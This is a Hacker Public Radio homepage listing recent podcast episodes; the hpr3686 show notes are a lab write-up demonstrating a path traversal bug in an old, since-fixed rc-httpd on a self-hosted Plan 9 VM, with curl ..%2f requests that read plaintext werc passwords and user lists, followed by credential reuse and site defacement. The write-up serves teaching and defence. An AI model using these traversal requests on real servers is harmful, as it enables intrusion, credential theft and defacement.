Site Map - skip to main content

Hacker Public Radio

Your ideas, projects, opinions - podcasted.

New episodes Monday through Friday.



Welcome to HPR the Community Podcast

We started producing shows as Today with a Techie on 2005-09-19, 17 years, 0 months, 13 days ago. our shows are produced by listeners like you and can be on any topic that "are of interest to hackers". if you listen to HPR then please consider contributing one show a year. if you record your show now it could be released in 17 days.

Meet the team


Latest Shows


hpr3695 :: How I watch youtube with newsboat

Using youtube's channel RSS feeds to watch youtube from the command line


Hosted by binrc on 2022-09-30 is flagged as Explicit and released under a CC-BY-SA license.
newsboat, RSS, youtube.
Listen in ogg, spx, or mp3 format. general. | Comments (2).

How I watch youtube with newsboat

I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS.

RSS is my favorite way of aggregating things that other people have made because it allows me, the user, to interact with their things

The only dependencies not on a standard UNIX system are newsboat and a video player. I also use yt-dlp to download videos for later viewing. I like mpv but you can substitute your own.

$ sudo $pkgmrg install newsboat mpv yt-dlp

Getting RSS feeds from youtube

Youtube (currently) provides RSS feeds for channels.

Finding Youtube channel ID

Sometimes channels have vanity URLs that can make it difficult to find the channel ID. Other times, the URL contains the channel ID. All youtube channel IDs start with the string UC so we can easily grep for them.

$ curl https://www.youtube.com/c/RMCRetro | grep --color "href=\"https://www.youtube.com/channel/UC"`
[ lots of nonsense ]
href="https://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w"
[ lots of nonsense ]

In order to turn this channel ID into something useful, we create the following URL:

https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w

Google takeout can also be used to export youtube subscriptions.

The export format is a CSV that contains the channel IDs for all of our subscriptions.

Channel Id,Channel Url,Channel Title
UCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave

Newsboat url list

Newsboat reads it’s list of URLs from ~/.config/newsboat/urls. Every url we add to this list will be automaticlly fetched. You can make separate URL lists for your list of videos and list of standard text based RSS feeds

If you have an exported CSV, you can easily modify it so that newsboat will accept it as a list of URLs by deleting row 1, column 1+comma, and replacing the comma between the URL and channel name with a tab character. Doing a sed 's/channel\//feeds\/videos.xml?channel_id=/g' on the file is an easy way to replace the website URL with the feed url. Newsboat only reads the first field of every row so the channel name can be kept for easier subscription management.

http://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w     RMC - The Cave

Newsboat config

In order to play videos, we need to add some macros to the newsboat config file at ~/.config/newsboat/config

Mine looks like this.

# load URLS on launch
auto-reload  yes

# vim binds
bind-key j down
bind-key k up
bind-key j next articlelist
bind-key k prev articlelist
bind-key J next-feed articlelist
bind-key K prev-feed articlelist
bind-key G end
bind-key g home
bind-key d pagedown
bind-key u pageup
bind-key l open
bind-key h quit
bind-key a toggle-article-read
bind-key n next-unread
bind-key N prev-unread
bind-key D pb-download
bind-key U bashow-urls
bind-key x pb-delete

# macro setup
browser linkhandler
macro , open-in-browser

# launch video player
macro v set browser "setsid -f mpv" ; open-in-browser ; set browser linkhandler

# download vidoe
macro d set browser "yt-dlp"; open-in-browser ; set browser linkhandler

# download audio only
macro a set browser "yt-dlp --embed-medatada -xic -f bestaudio/best" ; open-in-browser ; set browser linkhandler

Video demo

This is a demo of using newsboat with videos. In order to execute the macros, you type , then v or whatever other letter you set the macro to.

video in webm format your web browser or operating system does not support free video codecs :(

A url list to get you started

https://www.youtube.com/feeds/videos.xml?channel_id=UC3ts8coMP645hZw9JSD3pqQ        Andreas Kling
https://www.youtube.com/feeds/videos.xml?channel_id=UC9-y-6csu5WGm29I7JiwpnA        Computerphile
https://www.youtube.com/feeds/videos.xml?channel_id=UC15BJjhPr4d5gTClhmC4HRw        Elliot Coll
https://www.youtube.com/feeds/videos.xml?channel_id=UCxQKHvKbmSzGMvUrVtJYnUA        Learn Linux TV
https://www.youtube.com/feeds/videos.xml?channel_id=UCm9K6rby98W8JigLoZOh6FQ        LockPickingLawyer
https://www.youtube.com/feeds/videos.xml?channel_id=UCl2mFZoRqjw_ELax4Yisf6w        Louis Rossmann
https://www.youtube.com/feeds/videos.xml?channel_id=UC2eYFnH61tmytImy1mTYvhA        Luke Smith
https://www.youtube.com/feeds/videos.xml?channel_id=UC7YOGHUfC1Tb6E4pudI9STA        Mental Outlaw
https://www.youtube.com/feeds/videos.xml?channel_id=UCjFaPUcJU1vwk193mnW_w1w        Modern Vintage Gamer
https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w        RMC - The Cave
https://www.youtube.com/feeds/videos.xml?channel_id=UC4rqhyiTs7XyuODcECvuiiQ        Scott The Woz
https://www.youtube.com/feeds/videos.xml?channel_id=UC5I2hjZYiW9gZPVkvzM8_Cw        Techmoan
https://www.youtube.com/feeds/videos.xml?channel_id=UCy0tKL1T7wFoYcxCe0xjN6Q        Technology Connections
https://www.youtube.com/feeds/videos.xml?channel_id=UC8uT9cgJorJPWu7ITLGo9Ww        The 8-Bit Guy
https://www.youtube.com/feeds/videos.xml?channel_id=UC5UAwBUum7CPN5buc-_N1Fw        The Linux Experiment
https://www.youtube.com/feeds/videos.xml?channel_id=UCFMx-JitepTttWc-ABHhu8A        This Week in Retro
https://www.youtube.com/feeds/videos.xml?channel_id=UCsnGwSIHyoYN0kiINAGUKxg        Wolfgang's Channel
https://www.youtube.com/feeds/videos.xml?channel_id=UCJ8V9aiz50m6NVn0ix5v8RQ        decino                

hpr3694 :: Robo Tripping Ravelords of the Apocalypse

Organic Synthesis of Human and Machine Occurs Post Cosmic Event


Hosted by Mechatroniac on 2022-09-29 is flagged as Clean and released under a CC-BY-SA license.
beam,righttorepair,robots,mechatronics,apocalypse.
Listen in ogg, spx, or mp3 format. general. | Comments (5).

In the aftermath of the cosmic event that destroyed all computers below a certain die size, more robust machines emerge from the ashes.

Sketch of the machine


hpr3693 :: Fixing the automatic cutoff mechanism to an electric mower

Rho`n describes fixing the safety mechanism to his electric mower


Hosted by Rho`n on 2022-09-28 is flagged as Clean and released under a CC-BY-SA license.
electric lawnmower,lawnmower,repair.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Synopsis

In this episode, Rho`n fixes the safety mechanism to his Neuton electric mower. Recently the automatic cutoff mechanism was getting finicky. Needing to pull the safety bar back just the correct amount to keep the mower running. Often needing to keep hands on both the left and right sides of the safety bar to prevent the mower from turning off.

After opening up the housing holding the safety bars, it appeared that the tension spring which causes the bars to disengage from the switch when the bars are released was loose. This would allow the prong that the bars push into the switch contact to slip off the contact and slide overtop of the switch—turning off the mower. After tightening the coils and putting it back in place, the issue was resolved.

Neuton electric mower
Neuton electric mower with handle collapsed showing the bottom of the safety handle housing.
Internal view of safety mechanism
Internal view of the automatic cutoff mechanism.

Attribution

The transition sound used between audio clips is found on freesound.org:
Name: Harp Transition Music Cue
Author: DanJFilms
License: Creative Commons Zero


hpr3692 :: What is a real hacker?

I discuss the issue of what makes a real hacker with my my son


Hosted by Lurking Prion on 2022-09-27 is flagged as Explicit and released under a CC-BY-SA license.
cybersecurity,security,EvilSteve,hacking,hacker.
Listen in ogg, spx, or mp3 format. Privacy and Security. | Comments (2).

In this episode, I discuss the ever prominent question of "What is a real hacker?" in explicitly explicit language. So enjoy the discussion and give me your thoughts. This topic always gets peoples feathers ruffled, so agree, disagree? Leave your thoughts or post your own segment on HPR!


hpr3691 :: Starship.rs the best prompt I don't use

Bash prompts


Hosted by Klaatu on 2022-09-26 is flagged as Clean and released under a CC-BY-SA license.
bash,ps1,terminal,linux.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Here's the snippets I use in my .bashrc file.

RED='\033[0;31m'
PLAIN='\033[0m' # No Color
WHITE='\e[97m'
GREEN='\e[0;32m'
PURPLE='\e[35;35m'
CYAN='\e[36;36m'

JAVA_VERSION=`java --version | head -1 | cut -f2 -d' '`

IP=$(hostname -I | awk '{print $1;}' )
source /usr/doc/git-2.35.1/contrib/completion/git-prompt.sh
PS1='\! [\['$GREEN'\]$(hostname -s) $IP\['$PLAIN'\]] [\['$CYAN'\]$(pwd -P)\['$PLAIN'\]] $(__git_ps1 "[\['$PURPLE'\] %s\['$PLAIN'\]]")[☕ '$JAVA_VERSION']\n\['$GREEN'\]$\['$PLAIN'\] '

hpr3690 :: Planning the Trip

Taking our revised plan to completion


Hosted by Ahuka on 2022-09-23 is flagged as Clean and released under a CC-BY-SA license.
Travel, trip planning, full trip.
Listen in ogg, spx, or mp3 format. Travel. | Comments (0).

We take our revised objectives from the last episode and flesh out a completed plan that gets us out west and back home again.


hpr3689 :: Linux Inlaws S01E65: TerminusDB

TerminusDB NoSQL database


Hosted by monochromec on 2022-09-22 is flagged as Explicit and released under a CC-BY-SA license.
TerminusDB, graph databases, Seshat, Rust, Carbon by Google, Substack.
Listen in ogg, spx, or mp3 format. Linux Inlaws. | Comments (0).

As part of the effort of turning the planet's premier Rust marketing podcast into a full-blown NoSQL show, in this episode Chris hosts some of the key people behind a NoSQL database called TerminusDB (Martin couldn't make it as he was firing, um, re-organising the Inlaw's marketing department once again). Luke (the CEO) and Gavin (CTO) of TerminusDB spill the beans on the history of the project, ontologies and why they still matter not only in a mobile-first world and why a website called DB Engines simply doesn't do the trick (putting it very diplomatically). Never mind the road ahead... (including quantum AI and some other fancy stuff - you heard it here first!). And also next week's lotto numbers (perhaps).

Links:


hpr3688 :: Education, Certifications, and sipping on the Socials

I discuss the value of an Education, certifications, and a positive Social Media presence.


Hosted by Lurking Prion on 2022-09-21 is flagged as Explicit and released under a CC-BY-SA license.
cybersecurity,security,EvilSteve,socialmedia,education,certifications.
Listen in ogg, spx, or mp3 format. Privacy and Security. | Comments (0).

I have had a lot of questions over the years about how to proceed with a career, education, and certifications. So, I give my take on these and what they mean relative to my life experiences. Individual mileage may vary. I also discuss the need to have a public facing social media presence that is active and consistent. Hide the private Socials and search to see what actually shows up when searching for yourself. Your future employers will. Just sayin'.


hpr3687 :: Hacker Public Radio 2021 - 2022 New Years Show Part 6

The HPR community comes together to chat


Hosted by Honkeymagoo on 2022-09-20 is flagged as Explicit and released under a CC-BY-SA license.
HPR, New Years, Talking.
Listen in ogg, spx, or mp3 format. general. | Comments (1).

Hacker Public Radio New Years Eve Show 2021 - 2022

Part 6

https://rsgb.org/main/clubs-training/for-students/foundation/

https://logseq.com/

The End!

  • Thanks To:
    • Mumble Server: Delwin
    • HPR Site/VPS: Joshua Knapp - AnHonestHost.com
    • Streams: Honkeymagoo
    • EtherPad: HonkeyMagoo
    • Shownotes: HPLovecraft

Aftershow

Swedish new words of 2021: https://www.svt.se/kultur/experten-de-orden-kommer-jag-sakna-mest (Swedish)

https://en.wikipedia.org/wiki/Endometriosis

https://en.wikipedia.org/wiki/Vulvar_vestibulitis


hpr3686 :: Followup for HPR3675: Clarifications on the path traversal bug

installing a plan 9 cpu+web server, namespaces to the rescue, web app security models and more


Hosted by binrc on 2022-09-19 is flagged as Explicit and released under a CC-BY-SA license.
Plan 9, private namespaces, security, research operating systems.
Listen in ogg, spx, or mp3 format. general. | Comments (0).

Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models


Installing Plan 9 with libvirt

[root@localhost]# virt-install -n 9pwn \
--description "pre-patched rc-httpd" \
--osinfo=unknown \
--memory=4096 \
--vcpus=4 \
--disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 \
--graphics spice \
--cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso \
--network bridge=virbr0

[root@localhost]# virt-viewer 9pwn

How I find the IP of my guests and add it to my /etc/hosts for faster access.

[root@localhost]# virsh domiflist 9pwn
 Interface   Type     Source   Model   MAC
----------------------------------------------------------
 vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50

[root@localhost]# arp -e | grep 52:54:00:43:8a:50
192.168.122.20           ether   52:54:00:43:8a:50   C                     virbr0

[root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts

Proceed as normal with a 9 installation


Set up CPU server with rc-httpd and werc

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine) I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them.

I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

Configuring a CPU server

Add users to file server

Connect to the file server and add a new user called <ExampleUser> who is in the groups sys, adm, and upas

term% con -C /srv/cwfs.cmd
newuser <ExampleUser>
newuser sys +<ExampleUser>
newuser adm +<ExampleUser>
newuser upas +<ExampleUser>

Reboot and set user=<ExampleUser> when prompted at boot time.

Configure user's environment

This is similar to cp -r /etc/skel /home/<ExampleUser> on a UNIX system.

/sys/lib/newuser

Configure headless booting

Mount the boot partition:

term% 9fs 9fat

edit the boot config, /n/9fat/plan9.ini

bootfile=9pc64
nobootprompt=local!/dev/sdC0/fscache
mouseport=ps2
monitor=vesa
vgasize=1024x768x14
user=<ExampleUser>
tiltscreen=none
service=cpu

Add hostowner info to nvram

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner.

For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner's key to nvram.

term% nvram=/dev/sdF0/nvram auth/wrkey
bad nvram des key
bad authentication id
bad authentication domain
authid: <ExampleUser>
authdom: cirno
secstore key: <press the return key if you do not want to type this at boot time>
password: <make it 8 chars>

Configure auth server

In order to connect to the system over the network, the new user must be added to the auth server.

term% auth/keyfs
term% auth/changeuser <ExampleUser>
Password: <what you put earlier>
Confirm password:
Assign new Inferno/POP secret? [y/n]: n
Expiration date (YYYYMMDD or never) [never]: never
Post id:
User's full name:
Department #:
User's email address:
Sponsor's email address:
user <ExampleUser> installed for Plan 9

Configure permissions

/lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares).

append to /lib/ndb/auth

hostid=<ExampleUser>
    uid=!sys uid=!adm uid=*

then reboot

Test if it worked with drawterm

The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work.

$ /opt/drawterm -u <ExampleUser> -h example.com -a example.com -r ~/

Configure rc-httpd

edit /rc/bin/rc-httpd/select-handler

this file is something like /etc/httpd.conf on a UNIX system.

#!/bin/rc
PATH_INFO=$location

        switch($SERVER_NAME) {
        case example.com
               FS_ROOT=/sys/www/$SERVER_NAME
               exec static-or-index

        case *
              error 503
}

To listen on port 80 and run the handler on port 80:

cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80
cpu% chmod +x /rc/bin/rc-httpd/select-handler

Reboot and test.

SSL

I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs.

Generate and install:

cpu% ramfs -p
cpu% cd /tmp
cpu% auth/rsagen -t 'service=tls role=client owner=*' > key
cpu% chmod 600 key
cpu% cp key /sys/lib/tls/key
cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert
cpu% mkdir /cfg/$sysname
cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart

Now add a listener in /rc/bin/service/tcp443:

#!/bin/rc
exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*

And make it executable:

cpu% chmod +x /rc/bin/service/tcp443

Install and configure werc

cpu% cd
cpu% mkdir /sys/www && cd www
cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz  > werc-1.5.0.tgz
cpu% tar xzf werc-1.5.0.tgz
cpu% mv werc-1.5.0 werc

# ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK
# EG. DIRDIR, BLAGH, ETC
# DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK
# HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK
# PLEASE I BEG YOU
cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i

cpu% cd werc/sites/
cpu% mkdir example.com
cpu% mv default.cat-v.org example.com

now re-edit /rc/bin/rc-httpd/select-handler

#!/bin/rc
WERC=/sys/www/werc
PLAN9=/
PATH_INFO=$location
switch($SERVER_NAME){
case cirno
        FS_ROOT=$WERC/sites/$SERVER_NAME
        exec static-or-cgi $WERC/bin/werc.rc
case *
        error 503
}

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.


Path traversal vulnerabilities in old versions of rc-httpd

Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

The vulnerability

# get list of werc admin users
[root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members
pwn
# get that werc user's password
[root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password
supersecret

Wait, the passwords for werc are stored in plain text? Let's log in

[root@localhost]# firefox http://cirno/_users/login

Now let's see if any of the werc users are also system users:

# let's enumerate users
[root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users
-1:adm:adm:glenda,pwn
0:none::
1:tor:tor:
2:glenda:glenda:
3:pwn:pwn:
10000:sys::glenda,pwn
10001:map:map:
10002:doc::
10003:upas:upas:glenda,pwn
10004:font::
10005:bootes:bootes:

Let's hope that no one is re-using credentials. Let's check just to be sure

$ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G
cpu% cat /env/sysname
cirno
cpu%

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords

How the static-or-cgi handler works

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script.

I will compile these archaic rc scripts into pseudo code for the listener.

The static-or-cgi handler (the handler specified in the httpd config) is simple:

#!/bin/rc
cgiargs=$*

fn error{
    if(~ $1 404)
        exec cgi $cgiargs
    if not
        $rc_httpd_dir/handlers/error $1
}

if(~ $location */)
    exec cgi $cgiargs
if not
    exec serve-static
  1. If the requested file exists, call the cgi handler and pass it arguments.
  2. If the requested file does not exist, call the serve-static handler.

How the serve-static handler works

The problem lies in the serve-static handler:

#!/bin/rc
full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}
full_path=$"full_path
if(~ $full_path */)
    error 503
if(test -d $full_path){
    redirect perm $"location^'/' \
        'URL not quite right, and browser did not accept redirect.'
    exit
}
if(! test -e $full_path){
    error 404
    exit
}
if(! test -r $full_path){
    error 503
    exit
}
do_log 200
switch($full_path){
case *.html *.htm
        type=text/html
case *.css
        type=text/css
case *.txt *.md
        type=text/plain
case *.jpg *.jpeg
        type=image/jpeg
case *.gif
        type=image/gif
case *.png
        type=image/png
case *
        type=`{file -m $full_path}
}
if(~ $type text/*)
    type=$type^'; charset=utf-8'
max_age=3600    # 1 hour
echo 'HTTP/1.1 200 OK'^$cr
emit_extra_headers
echo 'Content-type: '^$type^$cr
echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr
echo 'Cache-control: max-age='^$max_age^$cr
echo $cr
exec cat $full_path
  1. encode the full file path into a url
  2. if the url points to a file outside of '*/', the document root, error 503
  3. if the url is broken, exit
  4. if the url points to a file that neither exists nor is readable, error 503
  5. if you haven't exited by now, serve the file

The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING.

The urlencode command works by decoding encoded characters.

cpu% echo 'http://cirno/..%2f' | urlencode -d
http://cirno/../

Does ../ exist in */ ? the answer is yes.

.. is a directory contained inside of */

*/../ is the current working directory.

How they fixed it

Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided.


Other (optional) bad config options in werc

rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability.

Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever.

I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser.

Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

# get config
[root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config
masterSite=cirno
siteTitle='Werc Test Suite'
conf_enable_wiki
wiki_editor_groups admin

Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

[root@localhost]# curl -s cirno | pandoc --from html --to plain
quotes | docs | repo | golang | sam | man | acme | Glenda | 9times |
harmful | 9P | cat-v.org

Related sites: | site updates | site map |

Werc Test Suite

-   › apps/
-   › titles/

SECURITY ADVISORY:

lol this guy still hasn't figured out the ..%2f trick

Powered by werc

Modifying werc to support password hashing

Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc

% echo 'supersecret' | sha1sum -2 512

Private namespaces to the rescue

Luckily enough, the webserver runs as the none user with it's own namespace.

Comparing the hostowner's namespace and none user's namespace

I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences.

cpu% ns | sort > cpu.ns
cpu% ps -a | grep -e 'listen.*80' | grep -v grep
none            355    0:00   0:00      132K Open     listen [/net/tcp/2 tcp!*!80]
cpu% ns 355 | sort > listen.ns
cpu% diff -u listen.ns cpu.ns
--- listen.ns
+++ cpu.ns
@@ -6,17 +6,29 @@
 bind  /amd64/bin /bin
 bind  /mnt /mnt
 bind  /mnt/exportfs /mnt/exportfs
+bind  /mnt/temp/factotum /mnt/factotum
 bind  /n /n
 bind  /net /net
 bind  /root /root
+bind -a '#$' /dev
 bind -a '#I' /net
+bind -a '#P' /dev
+bind -a '#S' /dev
 bind -a '#l' /net
+bind -a '#r' /dev
+bind -a '#t' /dev
+bind -a '#u' /dev
+bind -a '#u' /dev
 bind -a '#¤' /dev
 bind -a '#¶' /dev
+bind -a '#σ/usb' /dev
+bind -a '#σ/usbnet' /net
 bind -a /rc/bin /bin
 bind -a /root /
+bind -b '#k' /dev
 bind -c '#e' /env
 bind -c '#s' /srv
+bind -c /usr/pwn/tmp /tmp
 cd /usr/pwn
 mount -C '#s/boot' /n/other other
 mount -a '#s/boot' /
@@ -26,4 +38,4 @@
 mount -a '#s/slashmnt' /mnt
 mount -a '#s/slashn' /n
 mount -aC '#s/boot' /root
-mount -b '#s/factotum' /mnt
+mount -b '#s/cons' /dev

The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace:

  • '#$' PCI interfaces
  • '#P' APM power management
  • '#S' storage devices
  • '#r' realtime clock and nvram
  • '#t' serial ports
  • '#u' USB
  • '#σ' /shr global mountpoints
  • '#k' keyboard
  • /tmp directories
  • '#s' various special files relating to services

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.


Closing

An argument could be maid that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system".

I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system.

For example, when I write PHP applications, I consider things in this order:

  1. don't pass unnecessary resources into the document root via symlinks, bind mounts, etc.
  2. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes
  3. sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
  4. fire up a kali linux vm and beat the test server half to death
  5. iterate upon my ignorance
  6. doubly verify DAC just to be sure
  7. re-check daemon configs to make sure I'm not doing anything stupid
  8. FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc.

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system.

Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system?

Plan 9 is perfect for this type of research. I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape.

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought:

Criticism: This program/OS/whatever sucks

Response: I know, help me fix it.


Previous five weeks

hpr3685 :: Budget and an Android app hosted by Archer72

2022-09-16. 00:02:02. Clean. general.
.
Zoho docs for budgeting

hpr3684 :: Wake on Lan hosted by JWP

2022-09-15. 00:10:02. Clean. general.
.
Wake on Lan mother board feature

hpr3683 :: Add a favourite to OSMAnd hosted by Ken Fallon

2022-09-14. 00:01:37. Clean. general.
.
Ken keeps forgetting how to add a favourite to OSMAnd

hpr3682 :: Hacker Public Radio 2021 - 2022 New Years Show Part 5 hosted by Honkeymagoo

2022-09-13. 03:06:01. Clean. general.
.
The HPR community comes together to chat

hpr3681 :: Rust 101 Episode 3: Functionally Insane hosted by BlacKernel

2022-09-12. 00:41:21. Clean. Programming 101.
.
In this episode BlacKernel teaches you how to make functions and for loops in rust

hpr3680 :: EDIT hosted by Ahuka

2022-09-09. 00:12:19. Clean. DOS.
.
More on DOS. This time it is EDIT

hpr3679 :: Linux Inlaws S01E64: Non-profits in the US: A closer look at 501(c)s hosted by monochromec

2022-09-08. 00:36:17. Clean. Linux Inlaws.
.
The Ins and Outs of 501(c)s

hpr3678 :: "Stupid Users" ... no, not those users, the other "stupid users" hosted by Lurking Prion

2022-09-07. 00:15:07. Clean. Privacy and Security.
.
Brady & I discuss stupid things done by those of us who really should know better.

hpr3677 :: Hacker Public Radio 2021 - 2022 New Years Show Part 4 hosted by Honkeymagoo

2022-09-06. 03:14:13. Clean. general.
.
The HPR community comes together to chat

hpr3676 :: HPR Community News for August 2022 hosted by HPR Volunteers

2022-09-05. 02:39:36. Clean. HPR Community News.
.
HPR Volunteers talk about shows released and comments posted in August 2022

hpr3675 :: Plan 9: An exercise in futility hosted by binrc

2022-09-02. 01:19:31. Clean. general.
.
I talk about the design of Plan 9 and how I use it

hpr3674 :: Emergency Show posted in 2012. MUD hosted by Klaatu

2022-09-01. 00:20:41. Clean. general.
.
In today's show klaatu drags us through the mud with his somewhat belated descovery.

hpr3673 :: Recording for Hacker Public Radio hosted by dnt

2022-08-31. 00:17:46. Clean. Podcasting HowTo.
.
My experiences recording episodes of HPR

hpr3672 :: Hacker Public Radio 2021 - 2022 New Years Show Part 3 hosted by Honkeymagoo

2022-08-30. 03:18:54. Clean. general.
.
The HPR community comes together to chat

hpr3671 :: Response to Episode 3655, "BSD for Linux Users" hosted by Claudio Miranda

2022-08-29. 00:11:14. Clean. general.
.
Claudio responds to binrc's episode on BSD for Linux Users and rambles on about other BSD stuff.

hpr3670 :: Changing Plans hosted by Ahuka

2022-08-26. 00:16:28. Clean. Travel.
.
We look at some potential Covid-19 issues and consider alternatives

hpr3669 :: My First Podcast: My Journey into the Computer World hosted by Hipernike

2022-08-25. 00:20:07. Clean. How I got into tech.
.
How I was introduced into computers, Linux, robotics, programming, cibersecurity and more...

hpr3668 :: Linux Inlaws S01E63: John Hawley on kernel dot org and other shenanigans hosted by monochromec

2022-08-24. 01:31:54. Clean. Linux Inlaws.
.
An interview with John Hawley of kernel.org fame

hpr3667 :: Hacker Public Radio 2021 - 2022 New Years Show Part 2 hosted by Honkeymagoo

2022-08-23. 03:07:48. Clean. general.
.
The HPR community comes together to chat

hpr3666 :: One Weird Trick hosted by Lurking Prion

2022-08-22. 00:16:37. Clean. Privacy and Security.
.
I talk about getting into or advancing in cybersecurity & how keyboards could trick malware.

hpr3665 :: UNIX Is Sublime hosted by binrc

2022-08-19. 00:59:46. Clean. general.
.
I talk about all of the reasons I love UNIX

hpr3664 :: Secret hat conversations hosted by Some Guy On The Internet

2022-08-18. 00:17:50. Clean. general.
.
You'll need your tin hat for this one.

hpr3663 :: How I got into Tech hosted by Stache_AF

2022-08-17. 00:05:58. Clean. How I got into tech.
.
Follow-up episode about how I got into tech

hpr3662 :: Hacker Public Radio 2021 - 2022 New Years Show Part 1 hosted by Honkeymagoo

2022-08-16. 03:05:38. Clean. general.
.
The HPR community comes together to chat

hpr3661 :: Ham Radio testing hosted by Archer72

2022-08-15. 00:06:01. Clean. HAM radio.
.
Study and testing for the ARRL Ham license

